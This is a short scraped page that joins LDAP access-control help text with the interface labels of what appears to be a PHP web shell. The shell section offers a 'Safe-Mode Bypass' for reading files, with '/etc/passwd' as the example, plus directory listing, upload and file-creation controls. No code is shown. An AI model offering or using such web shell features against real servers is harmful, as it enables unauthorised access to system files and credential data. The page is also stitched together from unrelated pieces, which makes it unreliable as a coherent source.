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Access Control Rule
This page allows you to edit or create a single access control rule. The first section Objects being granted determines which DNs in your database the rule will apply to. You can either select All objects for the entire database, or Object with DN for objects matching whatever you enter into the adjacent field.

The match type menu determines if the rule applies to just this object, those under it, or if the DN is treated as a regular expression. You can also further control which objects are granted by entering an LDAP filter into the Limit with object filter field, like (objectClass=posixAccount).


The second part of the page is a table for selecting which LDAP users have access to the objects. You can either select several general user classes from the Grant access to menu, or choose Other and enter a specific DN.

The Access level menu determines what these users can do with the objects. The lower more powerful levels imply all of those above them, so a user with Write access can also Read and Search.


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Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

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